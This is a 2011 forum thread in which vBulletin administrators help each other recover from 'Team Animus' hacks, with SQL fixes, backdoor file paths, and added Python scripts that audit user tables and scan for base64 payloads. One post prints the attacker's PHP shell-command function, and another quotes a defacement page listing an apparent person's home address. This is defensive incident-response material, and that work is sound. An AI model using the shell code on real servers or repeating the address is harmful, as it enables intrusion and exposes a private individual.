Valter 05-05-2011 02:02 PM

Hacked by Team Animus?
 
If your forums have been hacked by "Team Animus", please read this to get help removing hacking traces and making your forums secure.

NOTE: Please be careful when removing any data. Make sure you have backups of your important files and databases!

What they did:
Code:

1. Added vba.php to INCLUDES folder
2. Replaced several index.php files, added some index.html files
3. Added new user with ID "13371338", admin status
4. Changed user titles to "Hacked by Team Animus"
5. Disabled current admins
6. Disabled forums

Here is what I have done:
Code:

01. MyAdmin > Deleted latest user (hacker - admin group)
02. MyAdmin > Changed autoincrement value in USER table to {LatestUserID} + 1
03. MyAdmin > Executed two queries to fix user titles:
        UPDATE user SET usertitle = replace(usertitle, "Hacked by Team Animus", "");
        UPDATE user SET customtitle = '0' where customtitle = '1';
04. FTP > To be sure that all files are OK, I've deleted everything from my forum folder, except:
        images, banners, .htaccess, favicon, config.php (re-checked content of this one, just in case)
05. FTP > Uploaded original forum files + custom .php's which belong to add-ons I'm using
06. FTP > Uploaded tools.php, restored my admin status, enabled forums
07. FTP > Deleted tools.php and /install/install.php
08. ACP > Removed "Skimlinks Plugin" (who installed this? hacker?) [struck out] - Edit: added by vB in 4.1.3
09. ACP > Updated "VSa - Advanced Forum Rules" add-on (download latest version: vB3.x, vB4.x)
10. ACP > Re-imported all add-ons I'm using, with "overwrite" checked, to ensure there are no modified codes
11. ACP > Maintenance > update user titles, fix broken user profiles, repair and optimize tables


If you have any questions, feel free to ask.

And again: Make sure you have backups of your important files and databases before you delete anything!

RCKSTR 05-05-2011 02:15 PM

ok, so I went to

user>operations>changed the user number to be correct>hit "go"

And it reverts right back to the 13371341

Any ideas?

Valter 05-05-2011 02:19 PM

It should be {LatestUserID} + 1.

Check user ID of your latest regular user (sort rows by user id desc). Let's say it's 456.
Go to USER table > Operations > change AUTO_INCREMENT to 457.

RCKSTR 05-05-2011 02:22 PM

nevermind, I missed 3 new registrants.
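
The ID arithmetic from the exchange above, as an added example that is not part of the original thread: it finds the jump in the user IDs, separates admin-group accounts above it from later registrants, and models MySQL's documented behaviour of resetting a too-low AUTO_INCREMENT request to MAX(id) + 1. The usergroup id 6, the gap threshold, the column names and the sample rows are assumptions constructed for illustration.

```python
ADMIN_GROUP_ID = 6                     # assumption: id of the Administrators usergroup
DEFACE_MARK = "Hacked by Team Animus"  # title string quoted in the thread
MIN_GAP = 100_000                      # assumption: a jump this big is not organic growth


def user(userid, name, group=2, title="Member"):
    """Build one constructed row with the columns this audit looks at."""
    return {"userid": userid, "username": name,
            "usergroupid": group, "usertitle": title}


# Constructed sample: four old accounts, one injected admin, three later sign-ups.
SAMPLE_USERS = [
    user(1, "owner", ADMIN_GROUP_ID, DEFACE_MARK),
    user(2, "mod", 5, DEFACE_MARK),
    user(455, "longtimer"),
    user(456, "newest_before_attack"),
    user(13371338, "injected", ADMIN_GROUP_ID),
    user(13371339, "signup_a"),
    user(13371340, "signup_b"),
    user(13371341, "signup_c"),
]


def effective_auto_increment(requested, ids):
    """Counter the table ends up with: a request that is not above MAX(id)
    is raised to MAX(id) + 1, so the 'Operations' form appears to revert."""
    return max([requested] + [i + 1 for i in ids])


def audit(rows, min_gap=MIN_GAP):
    """Split the user table at the first large ID jump and report on both sides."""
    ordered = sorted(rows, key=lambda r: r["userid"])
    split = len(ordered)
    for i in range(1, len(ordered)):
        if ordered[i]["userid"] - ordered[i - 1]["userid"] >= min_gap:
            split = i
            break
    below, above = ordered[:split], ordered[split:]
    last_legit = below[-1]["userid"] if below else 0

    # Admin-group accounts above the jump are the ones to delete first;
    # everything else up there registered after the counter was moved.
    admins_above = [r for r in above if r["usergroupid"] == ADMIN_GROUP_ID]
    to_review = [r for r in above if r["usergroupid"] != ADMIN_GROUP_ID]

    wanted = last_legit + 1
    kept_ids = [r["userid"] for r in below + to_review]
    return {
        "last_legit_id": last_legit,
        "admins_above_gap": admins_above,
        "to_review": to_review,
        "defaced_titles": sum(DEFACE_MARK in r["usertitle"] for r in ordered),
        "wanted_auto_increment": wanted,
        # What the counter stays at while the later sign-ups keep their IDs.
        "auto_increment_if_rows_stay": effective_auto_increment(wanted, kept_ids),
    }


if __name__ == "__main__":
    report = audit(SAMPLE_USERS)
    for key, value in report.items():
        print(key, "=", value)
```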

Valter 05-05-2011 02:43 PM

I'm still wondering how they added files.

There must be something more than Forum Rules add-on.

Boofo 05-05-2011 03:54 PM

If they breached the db because of the exploit it would be nothing to get to the server from there, I would think.

Oh, and this is legit:

08. ACP > Removed "Skimlinks Plugin" (who installed this? hacker?)

It was added in 4.1.3, I think.

Eplexx 05-05-2011 04:08 PM

Great share, I wasn't attacked thank god.

Zachery 05-05-2011 05:23 PM

Not every site had the same things done to it honestly. Having cleaned a number of them, lots of different things were done to different sites, not all steps were done to all of the sites. It would be in your best interests to RESTORE A BACKUP, or contact vBulletin support for help.

wraggster 05-05-2011 08:45 PM

my forum has also been hacked by 2 different groups, one just did a quick and simple redirect, the other has for the moment taken control and somehow they are redirecting everything to their server, my server admin isn't around at the moment so I'm totally at a loss how to kill them off

I've been hacked by http://pro2leet.net/forum.php and http://belegit.net/forum/ and both these sites use vBulletin software

AusPhotography 05-05-2011 10:35 PM

We were lucky in that (Australian time) the hack attack occurred in the early morning but after our daily 3am backup.

I changed passwords, I deleted all the newly updated files, I replaced them from original source, restored from the 3am backup - all good.
We only lost a handful of threads and posts, but it was the safest option IMHO.

Lessons?
1. Have a daily backup!
2. Have all the source code safe somewhere else.
3. Take more time to eyeball add-on code

Note: Valter's code has been around for years. NO ONE noticed the problem until now.

It's very easy to visually check all form fields and SQL in an addon; checking that vB cleaning and escape_string have been applied.
We (Admins) all need to be vigilant, no point blaming anyone, TeamAnimus have done us a favour by making us take security seriously.
Not that I would object to tasking Seal Team 6 onto TeamAnimus :D


Kym

--------------- Added 05-05-2011 at 11:44 PM ---------------

Quote:

Originally Posted by wraggster (Post 2192422)
my forum has also been hacked by 2 different groups, one just did a quick and simple redirect, the other has for the moment taken control and somehow they are redirecting everything to their server, my server admin isn't around at the moment so I'm totally at a loss how to kill them off

I've been hacked by http://pro2leet.net/forum.php and http://belegit.net/forum/ and both these sites use vBulletin software

Once the vba.php trojan is there, anyone can use it to hack your system. :eek:
Sounds like a piggy back attack to me. :(

EuroBeat2 05-06-2011 03:16 AM

I've got hacked. I hope I got it back, but for some reason my "user titles" are gone. Like "junior fellow" "senior fellow" etc. Any suggestion? I tried to repair tables etc, but to no avail.

Tx

EB

Frosty 05-06-2011 03:22 AM

Quote:

Originally Posted by Valter (Post 2192298)
I'm still wondering how they added files.

There must be something more than Forum Rules add-on.

After they got into the Admin Panel they could have easily added a plugin which would allow them to upload something on the site, i.e. a PHP shell for modifying the current files or uploading newer files.

SilentSleeper 05-06-2011 05:13 AM

Quote:

Originally Posted by EuroBeat2 (Post 2192547)
I've got hacked. I hope I got it back, but for some reason my "user titles" are gone. Like "junior fellow" "senior fellow" etc. Any suggestion? I tried to repair tables etc, but to no avail.

Tx

EB

1. Go into phpMyAdmin or connect via SSH
2. Open table user
3. Run SQL query
Code:

UPDATE user SET customtitle = '0' where customtitle = '1'
4. Then: Update the counters - Update User Titles and Ranks

Kangaroo666 05-08-2011 03:33 AM

Thanks for all your help Valter.

0ptima 05-09-2011 01:42 AM

Was everyone who got hacked using the Advanced Forum Rules?

Suiram 05-10-2011 02:33 PM

Quote:

Originally Posted by 0ptima (Post 2193493)
Was everyone who got hacked using the Advanced Forum Rules?

i was only using that mod and the vb forums - nothing else. so to me, it's clear what it was. lesson learned. i will never use another mod again. yes, really.

The Realist 05-10-2011 04:57 PM

Since updating this poor mod Cyb - Advanced Forums Rules I've followed the above and all looked great until today.

Came home from work and I could not find my forum, so I FTPed in and all my files, the lot, have been removed and the site is now no more. Team Animus were the original hackers but I think they installed a backdoor and then regained access and deleted the lot.

Not happy because I'm not running any backups locally and am hoping my host has backups.

May reupload vBulletin fresh and hope the database is ok.

Regards

TheLastSuperman 05-10-2011 05:34 PM

Quote:

Originally Posted by The Realist (Post 2194109)
Since updating this poor mod Cyb - Advanced Forums Rules I've followed the above and all looked great until today.

That mod is not "poor"; in fact, as other staff members have posted recently about this subject, the code has been there for years and was just now discovered as an exploit. The same thing can be said about countless other software. Do you see vBulletin being sued for someone not patching their site when an exploit is found? No, in fact everyone knows or should know it falls on you and solely you if not patched. Furthermore, that's just simply not fair to say despite what you're going through; YOU installed it, correct? Don't get me wrong, I'm not saying you can't feel "wronged", I'm simply saying if you point that anger towards someone it should not be Valter's mod you've been using and enjoying for a while now, it should be those who defaced your site respectively.

The Realist 05-10-2011 07:17 PM

Point taken.

Quote:

Originally Posted by TheLastSuperman (Post 2194130)
That mod is not "poor"; in fact, as other staff members have posted recently about this subject, the code has been there for years and was just now discovered as an exploit. The same thing can be said about countless other software. Do you see vBulletin being sued for someone not patching their site when an exploit is found? No, in fact everyone knows or should know it falls on you and solely you if not patched. Furthermore, that's just simply not fair to say despite what you're going through; YOU installed it, correct? Don't get me wrong, I'm not saying you can't feel "wronged", I'm simply saying if you point that anger towards someone it should not be Valter's mod you've been using and enjoying for a while now, it should be those who defaced your site respectively.


GRJoker 05-11-2011 07:24 PM

When I try to run the query it does not allow me to do so. Where exactly do you have to go to run the query?

borbole 05-11-2011 07:27 PM

Quote:

Originally Posted by GRJoker (Post 2194559)
When I try to run the query it does not allow me to do so. Where exactly do you have to go to run the query?

I assume you tried to run it from your ACP, right? You should enter your uid in the "can run queries" part of the config.php file to be able to run queries from your ACP.

Anyway, you can also run the query at the SQL box at your phpmyadmin in the CP of your host.

Bulldog Stang 05-12-2011 12:45 AM

I have now been hacked twice. I followed the stated guidelines and updated my CYB - Advanced Forum Rules as well. I have checked all files in FTP and removed any new ones. Also checked the db and deleted the new user.

I do not know what else to do here.

AusPhotography 05-12-2011 02:25 AM

We were attacked again today. Similar attack, but slightly different payload.
VSa - Advanced Forum Rules is the latest version, so I think there is another hole maybe in another plugin.

vijayninel 05-12-2011 03:22 AM

Quote:

Originally Posted by snoopytas (Post 2194640)
We were attacked again today. Similar attack, but slightly different payload.
VSa - Advanced Forum Rules is the latest version, so I think there is another hole maybe in another plugin.

What other plugins do you have? Are you sure they didn't leave any backdoors for them to come back the last time they hacked you?

AusPhotography 05-12-2011 04:29 AM

I have several other plugins.
I restored from a backup and re-loaded all scripts and removed vsa.php index.html etc.

The new payload concerns me, similar but different. It did include vsa.php (again)

HTML Code:

<head>
<title>hack by liut</title>
<script src="party.js"></script>
</head>
<body bgcolor="black">
<br/><br/>
<center>
<font color="white">make sur u turn up ur speakers so u can here me talk about the hack n express my opinions. btw i hacked slq injector db decriptin passwrds rite now :)</font>
<img src="http://i.imgur.com/QBquY.jpg" />
<object width="0" height="0">
<param name="movie" value="http://www.youtube.com/v/3a56LO3heac&autoplay=1&amp;hl=en_GB&amp;fs=1?color1=0x234900&amp;color2=0x4e9e00"></param>
<param name="allowFullScreen" value="true"></param>
<param name="allowscriptaccess" value="always"></param>
<embed src="http://www.youtube.com/v/3a56LO3heac&autoplay=1&amp;hl=en_GB&amp;fs=1?color1=0x234900&amp;color2=0x4e9e00" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="0" height="0">
</embed>
</object>
<object width="0" height="0">
<param name="movie" value="http://www.youtube.com/v/Xi5ZUVP62Iw&autoplay=1&amp;hl=en_GB&amp;fs=1?color1=0x234900&amp;color2=0x4e9e00"></param>
<param name="allowFullScreen" value="true"></param>
<param name="allowscriptaccess" value="always"></param>
<embed src="http://www.youtube.com/v/Xi5ZUVP62Iw&autoplay=1&amp;hl=en_GB&amp;fs=1?color1=0x234900&amp;color2=0x4e9e00" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="0" height="0">
</embed>
</object>
<font color="white">Phillip S Roberts<br />
14 Prince's St N<br/>
Exeter, Devon EX2 9AL, UK<br/>
i dar u 2 com get me u lil pussies i been doin mma for 4 months i can tak u</font>
</center>
</body>
</html>

--------------- Added 05-12-2011 at 06:53 AM ---------------

I just found that I had the first fixed version not the 2nd. Damn!

DeanoUK 05-12-2011 08:59 AM

Yep I've been hacked for the second time too - like the first time I didn't have that user or the vsa.php files etc. Just turned my forum off and removed my admin rights.

I've turned off all extensions for now, while this story pans out.

Infopro 05-12-2011 09:33 AM

You guys should check your own computers for issues. Are you using an FTP client that stores your passwords in plain text? Are you using SFTP for connecting to your server?

kh99 05-12-2011 09:37 AM

I think I've noticed another potential problem in Advanced Forum Rules. I've sent a PM to Valter but haven't heard back yet (is there someone else I should contact?)

borbole 05-12-2011 01:26 PM

Quote:

Originally Posted by kh99 (Post 2194701)
I think I've noticed another potential problem in Advanced Forum Rules. I've sent a PM to Valter but haven't heard back yet (is there someone else I should contact?)

I think in such cases you can contact the admins here.

RCKSTR 05-13-2011 08:23 PM

Just got the quarantine email, again

madshark 05-13-2011 09:18 PM

Ugh! Again? I just got the email as well. Wonder what's wrong now? >< Poor Valter.

CK 05-13-2011 09:32 PM

I keep reading "hacked by team Anus".

kh99 05-13-2011 09:37 PM

Quote:

Originally Posted by borbole (Post 2194751)
I think in such cases you can contact the admins here.

For future reference, don't PM. I'm told the correct thing to do would have been to click on "Report this Post" in the mod thread.

Suiram 05-13-2011 11:36 PM

Quote:

Originally Posted by Bulldog Stang (Post 2194632)
I have now been hacked twice. I followed the stated guidelines and updated my CYB - Advanced Forum Rules as well. I have checked all files in FTP and removed any new ones. Also checked the db and deleted the new user.

I do not know what else to do here.

you, me and many others.
uninstall this rotten back door to hell. it is now without a doubt that it has not been fixed, no matter the claims. it's getting to the point where you have to wonder if it's some kind of conspiracy or something. :mad: :down:
it is not a case where they breached before and were "waiting". i was only hacked after i upgraded to v4.0.4 and not before.

UNINSTALL ANY AND ALL MODS - PERIOD!!

Boofo 05-13-2011 11:42 PM

Removing all mods is a little extreme, don't you think?

g0dfather1984 05-13-2011 11:52 PM

Quote:

Originally Posted by Boofo (Post 2195384)
Removing all mods is a little extreme, don't you think?

While I do understand your frustration about everything, I kind of agree with Boofo here. Uninstalling every mod is a little extreme.

Suiram 05-14-2011 12:29 AM

yeah, sure. i suppose you could change that to all cyb mods.
but in my case i only ever used one mod. the cyb afr one. i uninstalled it and also decided to keep my vb forum vanilla. apart from changing colors and stuff from within it, that is it for me. lesson learned. i'm too much a control freak to allow myself to be "violated" again. :P (one rape is enough)

aquariumpros 05-14-2011 12:29 AM

Quote:

Originally Posted by Suiram (Post 2195382)
you, me and many others.
uninstall this rotten back door to hell. ...

UNINSTALL ANY AND ALL MODS - PERIOD!!

Might want to try to understand that ANY AND ALL code is susceptible to exploits - hence the reason there are always updates and patches offered (even for operating systems, and vBulletin core software, etc.).


If you were hacked again - you didn't completely purge the server of the exploitable code.

Ensure that all copies of vba.php have been removed:
/forum/includes/vba.php
/forum/includes/xml/vba.php


Also - check (or get your host to check) your server logs for access.

Also - do a full scan of the database; as we had base64 data encoded into the database in the rtable field within the guest table.


Entries I removed:

| guestid | hostip | useragent | lastactive | spider | script | rdata |


...cont'd in next post due to character limits

aquariumpros 05-14-2011 12:30 AM


One way people make mass changes of that nature is to use a mass defacer script. In part the code I removed from the database did allow for php or shell commands to be executed without placing files into the account.

One occurrence was at: Tue May 10 07:58:35 CDT 2011 by this IP: 183.99.33.109
Code:

 
  echo "v0pCr3w
  ";
  echo "sys:".php_uname()."
  ";
  $cmd="echo nob0dyCr3w";
  $eseguicmd=ex($cmd);
  echo $eseguicmd;
  function ex($cfe){
  $res = '';
  if (!empty($cfe)){
  if(function_exists('exec')){
  @exec($cfe,$res);
  $res = join("\n",$res);
  }
  elseif(function_exists('shell_exec')){
  $res = @shell_exec($cfe);
  }
  elseif(function_exists('system')){
  @ob_start();
  @system($cfe);
  $res = @ob_get_contents();
  @ob_end_clean();
  }
  elseif(function_exists('passthru')){
  @ob_start();
  @passthru($cfe);
  $res = @ob_get_contents();
  @ob_end_clean();
  }
  elseif(@is_resource($f = @popen($cfe,"r"))){
  $res = "";
  while(!@feof($f)) { $res .= @fread($f,1024); }
  @pclose($f);
  }}
  return $res;
  }
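
A static scanner for the kind of rows described in the two posts above, added here as an example and not part of the original thread: it finds eval/include/echo calls wrapped around base64_decode in a text column, decodes the argument without executing anything, follows nested layers, and lists remote URLs and command-execution calls in the result. The row layout (guestid, script, rdata) follows the table header quoted above; the function names are hypothetical and all sample rows are constructed with harmless contents.

```python
import base64
import re

# eval/include/echo wrapped directly around base64_decode("..."); the closing
# quote and parenthesis are optional so values cut off by a column limit match.
WRAPPER = re.compile(
    r"""\b(?P<call>eval|include|include_once|require|require_once|echo)\s*\(\s*
        base64_decode\s*\(\s*(?P<q>['"])(?P<blob>[A-Za-z0-9+/=\s]+)
        (?P<close>(?P=q)\s*\))?""",
    re.VERBOSE | re.IGNORECASE,
)
# Command-execution functions that the decoded shell in this thread tries in turn.
EXEC_CALL = re.compile(r"\b(exec|shell_exec|system|passthru|popen)\s*\(", re.IGNORECASE)
URL = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)


def decode_blob(blob):
    """Base64-decode to text without executing it; None if nothing decodes."""
    compact = re.sub(r"\s+", "", blob)
    compact = compact[:len(compact) - len(compact) % 4]  # keep whole 4-char groups
    if not compact:
        return None
    try:
        raw = base64.b64decode(compact, validate=True)
    except ValueError:
        return None
    return raw.decode("utf-8", errors="replace")


def scan_text(text, depth=0, max_depth=3):
    """Return one finding per wrapper call, following nested encoded layers."""
    findings = []
    for m in WRAPPER.finditer(text):
        decoded = decode_blob(m.group("blob"))
        findings.append({
            "wrapper": m.group("call").lower(),
            "depth": depth,
            "truncated": m.group("close") is None,
            "decoded": decoded,
            "urls": URL.findall(decoded or ""),
            "exec_funcs": sorted({f.lower() for f in EXEC_CALL.findall(decoded or "")}),
        })
        if decoded and depth < max_depth:
            findings.extend(scan_text(decoded, depth + 1, max_depth))
    return findings


def scan_rows(rows, column="rdata"):
    """Scan one text column of every row; return (guestid, finding) pairs."""
    return [(row["guestid"], finding)
            for row in rows
            for finding in scan_text(row.get(column) or "")]


def b64(text):
    return base64.b64encode(text.encode()).decode()


def make_row(guestid, script, author_name):
    """Build one constructed row whose rdata is PHP-serialized form input."""
    rdata = 'a:2:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:%d:"%s";}' % (
        len(author_name), author_name)
    return {"guestid": guestid, "script": script, "rdata": rdata}


# Constructed sample rows; every payload is a harmless placeholder.
INNER_LAYER = "eval(base64_decode('%s'));" % b64("@passthru($c);")
SAMPLE_ROWS = [
    make_row("row-1", "contact", 'include(base64_decode("%s"));die();'
             % b64("http://files.example.invalid/bot.txt?")),
    make_row("row-2", "index", "eval(base64_decode('%s'));die;"
             % b64('echo "marker"; @system($cmd);')),
    make_row("row-3", "contact", "eval(base64_decode('%s'));die;" % b64(INNER_LAYER)),
    make_row("row-4", "contact", "eval(base64_decode('%s"   # cut off mid-blob
             % b64('echo "marker"; @system($cmd);')[:21]),
    make_row("row-5", "contact", "Alice"),
]

if __name__ == "__main__":
    for guestid, finding in scan_rows(SAMPLE_ROWS):
        print(guestid, finding)
```

Run against an exported copy of the table rather than the live database, and treat any hit as a reason to inspect the whole row.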


A Dead Puppie 05-14-2011 12:44 AM

Anyone who was using the old version of the Advanced Forum Rules mod, any version, could/was suspect to hackers. There is a fixed update somewhere. Best thing to do is uninstall the mod, remove all files from the server, and re-upload the updated version.


All times are GMT.